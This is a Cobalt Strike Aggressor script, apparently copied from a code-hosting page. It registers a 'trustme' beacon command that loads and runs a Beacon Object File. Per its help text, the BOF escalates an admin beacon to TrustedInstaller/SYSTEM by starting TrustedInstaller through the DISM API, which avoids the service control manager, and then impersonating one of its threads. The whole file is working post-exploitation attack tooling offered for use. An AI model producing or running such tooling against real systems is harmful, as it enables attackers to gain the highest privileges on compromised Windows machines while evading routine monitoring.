39 lines
1.3 KiB
Plaintext
39 lines
1.3 KiB
Plaintext
|
#
|
||
|
|
# trustme.cna - Aggressor script for the TrustedInstaller impersonation BOF
|
||
|
|
#
|
||
|
|
# Usage: trustme
|
||
|
|
# Requires: Admin beacon with SeDebugPrivilege available
|
||
|
|
# Revert: rev2self
|
||
|
|
#
|
||
|
|
|
||
|
|
beacon_command_register(
|
||
|
|
"trustme",
|
||
|
|
"Impersonate TrustedInstaller via DISM API trigger and thread impersonation.",
|
||
|
|
"Synopsis: trustme\n\nElevates the current beacon thread to TrustedInstaller/SYSTEM context.\nUses the DISM API to start TrustedInstaller.exe without touching SCM,\nthen walks processes via NtGetNextProcess and impersonates a thread.\n\nRequires: Elevated (admin) beacon.\nRevert: rev2self"
|
||
|
|
);
|
||
|
|
|
||
|
|
alias trustme {
|
||
|
|
local('$barch $handle $data $args');
|
||
|
|
|
||
|
|
# Verify the beacon is in an elevated context
|
||
|
|
if (!-isadmin $1) {
|
||
|
|
berror($1, "trustme requires an elevated (admin) beacon.");
|
||
|
|
return;
|
||
|
|
}
|
||
|
|
|
||
|
|
# Determine architecture and load the correct object file
|
||
|
|
$barch = barch($1);
|
||
|
|
$handle = openf(script_resource("trustme. $+ $barch $+ .o"));
|
||
|
|
$data = readb($handle, -1);
|
||
|
|
closef($handle);
|
||
|
|
|
||
|
|
if (strlen($data) == 0) {
|
||
|
|
berror($1, "Could not read trustme. $+ $barch $+ .o, is the object file in the same directory as this script?");
|
||
|
|
return;
|
||
|
|
}
|
||
|
|
|
||
|
|
# No arguments needed for this BOF
|
||
|
|
btask($1, "Attempting to impersonate TrustedInstaller via DISM...");
|
||
|
|
beacon_inline_execute($1, $data, "go", $null);
|
||
|
|
}
|